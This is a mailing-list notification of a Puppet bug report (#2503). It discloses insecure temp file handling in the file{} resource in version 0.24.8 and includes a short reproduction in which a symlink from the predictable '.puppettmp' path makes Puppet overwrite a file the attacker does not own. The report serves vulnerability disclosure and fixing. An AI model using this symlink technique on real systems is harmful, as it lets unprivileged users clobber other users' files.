Issue #2503 has been reported by volcane volcane.

----------------------------------------
Bug #2503: Insecure temp file handling in file{}
http://projects.reductivelabs.com/issues/2503

Author: volcane volcane
Status: Unreviewed
Priority: Normal
Assigned to: 
Category: 
Target version: 
Complexity: Unknown
Affected version: 0.24.8
Keywords: 


file{} does a rather stupid thing with temp files.

The result is that users could potentially overwrite files they don't own with 
the help of puppet:

confirmed on 0.24.8.

## /tmp/securefile
secure file contents

## evil user does
ln -s /tmp/securefile /home/rip/somefile.puppettmp 


## manifest does
file{"/home/rip/somefile":
   content => "managed by puppet\n"
}

## runit
notice: //File[/home/rip/somefile]/content: defined 'content' as 
'{md5}89a502238a07c7e92a7398383d88b7a2'


## /tmp/securefile
puppet content



-- 
You have received this notification because you have either subscribed to it, 
or are involved in it.
To change your notification preferences, please click here: 
http://reductivelabs.com/redmine/my/account

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups 
"Puppet Bugs" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to 
[email protected]
For more options, visit this group at 
http://groups.google.com/group/puppet-bugs?hl=en
-~----------~----~----~----~------~----~------~--~---

Reply via email to